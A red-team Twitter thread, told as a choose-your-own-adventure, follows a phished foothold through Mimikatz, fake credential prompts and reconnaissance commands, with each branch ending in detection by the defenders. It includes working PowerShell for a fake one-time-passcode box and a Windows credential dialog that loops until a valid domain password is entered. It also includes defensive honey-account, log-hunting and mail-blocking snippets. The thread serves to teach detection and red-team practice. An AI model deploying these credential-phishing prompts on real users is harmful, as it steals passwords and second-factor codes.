Choose your own #RedTeam adventure.
Your phish lands on a host. What is the first thing you do?

(If 4 answers aren't enough, reply below)
== IF YOU CHOSE MIMIKATZ ==
Congrats. It’s Win 7 and you now have 2 plaintext passwords. One looks like a Domain Admin account!

You attempt to move laterally to another host with the DA password. Access Denied.

What?

Try again.

Access Denied.

Try again!

2/10
You try the second account. It’s not an admin. No dice. Can’t move with it.

The target org doesn't have any single-factor, externally facing services. You need the second factor, so you go to work building a UI to prompt the user for their one-time passcode.

3/10
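A UI like that doesn't take much. Here's a minimal sketch of the idea in PowerShell, assuming a plain input box is convincing enough; the wording, title, and the notion that you'd ship the result back over your existing C2 channel are illustrative, not any particular tool:

# OTP-prompt sketch (illustrative): pop a basic input box asking for the
# one-time passcode, then hand back whatever the user types.
Add-Type -AssemblyName Microsoft.VisualBasic

$otp = [Microsoft.VisualBasic.Interaction]::InputBox(
    "Your session has expired. Enter the 6-digit code from your authenticator app to continue.",
    "Verification Required",
    "")

# In a real operation this would go back over the existing C2 channel;
# printing it stands in for that here.
Write-Output $otp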
30 minutes later, your shell is lost.

Hmm. You try resending your phish to other victims, but your pixel trackers suggest they're not landing in any inboxes at all. Your mail service says they were delivered, though.

4/10
You try sending more phishes from a different domain but don't switch IPs. Same result. Days go by.

You’re out of time.

GAME OVER

5/10
Post-analysis:

Running Mimikatz tripped a silent alarm, which took 7 minutes to get the SOC's attention.

The DA password was a simple fake (invoke-honeyaccount). The password wasn't real, and the SOC gets an alert any time someone tries to log in with that account.

6/10
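The detection half of a honey credential like that can be almost trivially simple. A rough sketch, assuming a decoy account named 'svc-da-backup' (hypothetical) and with a console warning standing in for whatever the SOC's real alerting pipeline does:

# Honey-account alert sketch: any logon attempt, successful (4624) or failed (4625),
# that references the decoy account is treated as evidence of credential theft.
# Account name and polling window are made up for illustration.
$honeyAccount = 'svc-da-backup'

$hits = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4624, 4625
    StartTime = (Get-Date).AddMinutes(-10)
} -ErrorAction SilentlyContinue | Where-Object { $_.Message -match $honeyAccount }

if ($hits) {
    # A real SOC would page an analyst or open a case; a warning stands in for that.
    Write-Warning "Honey account '$honeyAccount' seen in $($hits.Count) logon attempt(s). Investigate."
}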
By 9 minutes in, the SOC had correlated the attempted DA logins on the second host with Mimikatz. They watched your subsequent failed attempts (you tried 8 times!) until you gave up. They also saw the first non-admin account, which confirmed patient zero.

7/10
By 30 minutes in, the SOC had pulled all traffic sources/destinations from the first host and located the domain that hosted your phish. They blacklisted it by domain and IP at the SMTP gateway and filed an abuse request with the provider.

8/10
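If the SMTP gateway happens to be Exchange, the domain half of that block can be a one-liner; a sketch under that assumption (the domain is made up, and the IP block would happen separately at the edge):

# Mail-flow block sketch (assumes an Exchange-based gateway; domain is illustrative).
# Drop anything claiming to come from the phishing sender domain.
New-TransportRule -Name "Block red-team phish domain" -SenderDomainIs "totally-legit-invoices.example" -DeleteMessage $true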
They also signatured the payload in your lure using yara, which is why all your future attempts on new infra were futile. Initial execution is hard; that technique took you weeks to work out. Now it's gone.

9/10
This is what it’s like to go against a good defender. You’ve got to bring your A game, Leroy Jenkins.

10/10
== IF YOU CHOSE PROMPT USER FOR PASSWORDS ==

You saw a nifty tool the other day on a blog. It generates a dialog box that looks like the Windows security UI, prompting for passwords. You decided to use it: it's convenient and executes as in-memory PowerShell.

1/18
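The blog tool isn't named, but the core of it fits in a few lines. A minimal sketch using PowerShell's built-in credential prompt, which renders the familiar Windows security dialog in GUI hosts (the caption and message text are illustrative):

# Credential-prompt sketch: ask the current user to "re-authenticate" with the
# standard Windows credential dialog, pre-filled with their own account name.
$cred = $Host.UI.PromptForCredential(
    "Windows Security",
    "Your session has expired. Please re-enter your password.",
    "$env:USERDOMAIN\$env:USERNAME",
    "")

# If the user dismisses the dialog, $cred is $null; returning an empty string here
# is exactly the problem the next few tweets run into.
if ($cred) { $cred.GetNetworkCredential().Password } else { '' }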
So you copy the PowerShell, paste it into your C2 backend, and wait.

Response came back: empty string. No password. What happened?

You try it on your VM. If the user clicks the "x", it just exits and returns an empty-string password.

Try it again.

2/18
After waiting, the response is another empty string. Argh!

You go look at the source code. You're a great Googler. A few minutes later, you find a Stack Overflow article showing how to disable the "x" button. You repackage and send it in.

3/18
This time you get a response: "asdf"

No way that's the password. You attempt to verify it; result: authentication failure.

You go back to the source code. A few more Stack Overflow articles later, you have a version that won't exit until it gets a password that actually works.

4/18
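Wiring the prompt to a real credential check is the part the Stack Overflow trips were for. A rough sketch of that loop, assuming the domain is reachable from the host and using the same illustrative prompt text as above:

# Loop-until-valid sketch: keep re-prompting until the supplied password
# actually authenticates against the domain.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$ctxType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
$ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ctxType)

do {
    $cred = $Host.UI.PromptForCredential(
        "Windows Security",
        "Your credentials could not be verified. Please try again.",
        "$env:USERDOMAIN\$env:USERNAME",
        "")
    $valid = $false
    if ($cred) {
        # ValidateCredentials returns $true only if the username/password pair works.
        $net   = $cred.GetNetworkCredential()
        $valid = $ctx.ValidateCredentials($net.UserName, $net.Password)
    }
} until ($valid)

# $cred now holds a working credential (and the user has seen a lot of prompts).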
Send the new one. Wait... Got a result. This one looks real. Finally.

You attempt to verify it; result: authentication success. It's legit. Your code works.

Now, what to do with it?

5/18
You didn't notice the user wasn't an admin. There are no lateral movement opportunities with that credential. You consider modifying your code again to prompt for an admin, looping until you get actual admin access.

Then ...

You noticed your shell stopped calling home.

6/18
You try sending your phish to another target. It never arrives.

Maybe it's your hosting provider. You swap and try again. Still never arrives.

You run out of time.

GAME OVER.

7/18
POST ANALYSIS:

You didn't look where you landed or what was running. You didn't notice the EDR product running or the fact that it was PowerShell v5 with central logging turned on.

8/18
All PowerShell logs to a central source. Every hour (they can only run it hourly for performance reasons), the Hunt Team queries all PowerShell executed in the environment for the presence of B64 payloads and certain namespaces.

9/18
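Run against a single host instead of the central store, that hunt looks roughly like the sketch below; the one-hour window matches the story, but the Base64 and namespace patterns are illustrative stand-ins for the team's real query:

# Hunt-query sketch: look back over the last hour of PowerShell script block logs
# (event ID 4104) for long Base64 runs or suspicious .NET namespaces.
$since = (Get-Date).AddHours(-1)

$hits = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = $since
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match '[A-Za-z0-9+/]{200,}={0,2}' -or $_.Message -match 'System\.Reflection|VirtualAlloc' }

$hits | Select-Object TimeCreated, MachineName | Format-Table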
That means on average you have a 30-minute window. Fortunately for you, your payload landed 12 minutes after the last query, so you had 48 minutes before it percolated into an analyst's queue.

10/18
It was also a busy day at the SOC, they were short-handed, and it was lunchtime, so you got a few extra minutes. They don't just block all PowerShell--they've wanted to, but there's been internal friction about making such a policy.

11/18
Your PowerShell was eventually analyzed 82 minutes after your phish landed, then correlated with the failed authentication attempts at the 93-minute mark. IR began triaging the host you landed on, when ...

12/18
... the Helpdesk escalated a support ticket from the affected user complaining about the 18 password prompts she received today (she counted them).

IR finishes a quick check to ensure no other machines on the network are talking to your C2 domain. None are.

13/18
So your domain was blocked for new connections at roughly the 112-minute mark, but the egress stack allows established connections to persist. They finally cut off your connection at 128 minutes.

14/18
Not bad, considering all the teams and moving pieces involved. It certainly helped that nobody in Accounting ever runs PowerShell, which they finally used as justification to block it for everyone outside of IT. The new policy took effect immediately.

15/18
Any future phishes would have died, because all of your post-exploitation kit is in PowerShell. But, for completeness, they had the ingress team immediately draft a yara rule for the initial phish; it took them some time, but they had it in place by the 140-minute mark.

16/18
That explains why switching infrastructure didn't matter. They did notice all of the future attempts coming inbound, though. They created a special queue for them. They observed some tweaks you made and they tweaked yara as well.

17/18
Red Teaming can be hard.

That's ok, this isn't a failure; it helped them improve processes, policy, and detections, but you didn't hit your objective. Not even close.

There's always next time.

THE END

18/18
== IF YOU CHOSE "Figure out where I am" ==

How do you do it?
== IF YOU CHOSE "Figure out what's running" ==

How do you do it?
I should have added:

"I don't know, however beacon does it" 🤣
== IF YOU CHOSE "ifconfig, whoami, net * commands" ==

You run "ipconfig": 10.42.98.19
Then you run "whoami": CORP\Bob
Then you run "whoami /groups": no, Bob is not a local admin, but he does belong to several Accounting groups.
Then you run "net localgroup administrators" to see who the real admins are. You repeat for nested groups. You also look up "net group Domain Admins /domain", for completeness.
After about an hour of looking, and sorting your results in your notes, you have a good list of next targets.

Then your connection drops! What happened? "Maybe Bob just shut his laptop" you say to yourself.
You send your phish to another user, Alice, from another SMTP domain that you frequently use on engagements. You give it an hour or so, but there's no indication it was delivered. So you switch to another domain. And another. You exhaust your list. None of them work.
You run out of time.

GAME OVER.
Post-Analysis:

These commands have been around since the beginning of the command line, and you can execute them in your sleep, which must be what you were doing, because you didn't notice the endpoint controls running on this host.
Commands are actually new processes, and each process, along with its arguments, is logged centrally by the endpoint detection and response (EDR) product, where a combination of commoditized and custom analytics run against the logs.
One of the analysis layers observed that no other users in Accounting have ever executed "whoami /groups", which flagged the host for review. Your intrusion lasted 58 minutes before your host was put into a containment VLAN and the callback domain was blocked across the enterprise.
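A single-host approximation of that analytic, assuming Sysmon process-creation logging stands in for the EDR's telemetry; the part that actually makes it fire, the "nobody in Accounting has ever run this" baseline, lives centrally and is only hinted at here:

# Analytic sketch: find process-creation events (Sysmon event ID 1) where someone
# ran "whoami /groups". Unremarkable for admins, anomalous for Accounting users,
# which is the baseline the central analytics would join against.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'
    Id      = 1
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'whoami(\.exe"?)?\s+/groups' }

$events | Select-Object TimeCreated, MachineName | Format-Table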
The raw Indicators of Compromise (IOCs) were passed to a third-party threat intel team that maintains a large database of domains and IP addresses used maliciously. They reviewed the callback domain, noting that until 11 days ago it was parked at a specific hosting provider.
Pivoting off the original parked IP address, they observed eleven other parked domains, and blacklisted all of them at the enterprise’s edge, which is why your SMTP email from other domains did not work, nor would the callbacks have worked had the payloads landed.
Lesson Learned: know your environment. Red Teaming can be hard.

Your client takes this as validation that their EDR product and hunting processes worked, so it's not a _completely_ wasted effort.